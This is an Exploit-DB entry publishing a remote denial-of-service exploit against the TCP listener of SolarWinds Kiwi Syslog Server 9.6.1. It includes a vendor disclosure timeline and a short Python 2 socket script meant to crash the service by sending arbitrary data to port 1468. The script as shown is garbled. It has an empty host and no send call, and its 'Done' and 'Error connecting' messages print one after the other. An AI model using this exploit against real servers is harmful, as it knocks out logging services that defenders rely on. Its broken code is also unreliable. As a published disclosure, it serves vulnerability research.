EDB-ID: 42411 | Author: Guillaume Kaddouch | Published: 2017-08-01 | CVE: N/A | Type: Dos | Platform: Windows | Vulnerable App: | # Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.solarwinds.com/
# Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
# Version:
# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
# Category: DoS
Disclosure Timeline:
2017-05-20: Vulnerability discovered
2017-05-26: Vendor contacted
2017-05-31: Vendor answered (technical support)
2017-05-31: Vendor contacted (no answer)
2017-08-01: Exploit published
Description :
A remote Denial of Service exists in Kiwi Syslog in the TCP listener.
Apparently any data sent to it make it crash because of a Type Mismatch error.
The syslog TCP listener is disabled by default.
- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
- Run this exploit locally or from your remote attacking machine.
import socket
host = ""
port = 1468
buffer = "crash please?"
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Sending buffer... (%d bytes)" % len(buffer)
print "[*] Done."
print "[-] Error connecting"